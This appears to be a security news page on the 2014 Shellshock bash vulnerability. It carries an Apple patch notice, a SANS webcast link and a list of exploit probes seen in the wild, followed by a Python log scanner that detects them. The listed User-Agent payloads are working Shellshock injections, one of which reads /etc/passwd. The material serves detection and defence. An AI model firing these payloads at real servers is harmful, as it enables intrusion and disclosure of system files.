Varanoid.com

Apple Releases OS X bash Update 1.0

Original release date: September 30, 2014

Apple has released OS X bash Update 1.0 to address vulnerabilities found in the Bourne-again Shell (bash) which could allow a remote attacker to execute arbitrary shell commands.

Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

I just published an updated YouTube presentation (about 15 min in length) with some of the shell shock related news from the last couple days:

YouTube: https://www.youtube.com/watch?v=b2HKgkH4LrQ
PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf
PPT: https://isc.sans.edu/presentations/ShellShockV2.pptx
Audio:

As always, the material is published “creative commons / share alike”, so feel free to use the slides.

— Johannes B

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the Shellshock vulnerability was announced, we have seen a large number of scans probing for it. Here is a quick review of the exploits our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a;
() { :;}; echo ‘Shellshock: Vulnerable’
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Content-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent
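The common trait of every probe above is the bash function-definition prefix `() {` placed in a header that a CGI handler copies into an environment variable. The following is an added example, not code from the ISC diary or its honeypots: a small Python scanner that parses Apache combined-format access-log lines (constructed sample lines, modelled on the User-Agents listed) and flags requests carrying that prefix. It goes slightly beyond the diary by also checking the Referer and the request line, since CGI exports those to the environment the same way.

```python
import re

# Constructed sample log lines (not the diary's honeypot data): two Shellshock
# probes patterned on the User-Agents above, plus one ordinary browser request.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Sep/2014:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo 'Shellshock: Vulnerable'"
203.0.113.9 - - [29/Sep/2014:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { 0v3r1d3;};echo Content-type: text/plain; echo; uname -a;"
198.51.100.7 - - [29/Sep/2014:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36"
"""

# Apache "combined" format: client IP first, then request line, status, size,
# Referer and User-Agent. The User-Agent is matched greedily to the final quote
# because a probe may itself contain double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Shellshock needs bash to see a value that starts like a function definition:
# "()" followed by optional whitespace and "{". Whatever follows "};" is the
# payload, so matching the prefix alone catches every variant listed above.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_line(line):
    """Return the fields of one combined-format line, or None if unparseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_probe(value):
    """True if a header or request value carries the function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def find_probes(log_text):
    """Scan log text and return one record per request that looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # CGI exports User-Agent, Referer and the request line into the
        # environment, so any of the three can deliver the trigger.
        for field in ("ua", "referer", "request"):
            if is_shellshock_probe(rec[field]):
                hits.append({"ip": rec["ip"], "field": field,
                             "value": rec[field], "request": rec["request"]})
                break
    return hits


if __name__ == "__main__":
    for h in find_probes(SAMPLE_LOG):
        print(f"{h['ip']} probe via {h['field']} on {h['request']!r}: {h['value']}")
```

Run against a real access log by reading the file into `find_probes`; a hit on a `/cgi-bin/` path on a host with an unpatched bash is the case that deserves a forensic look.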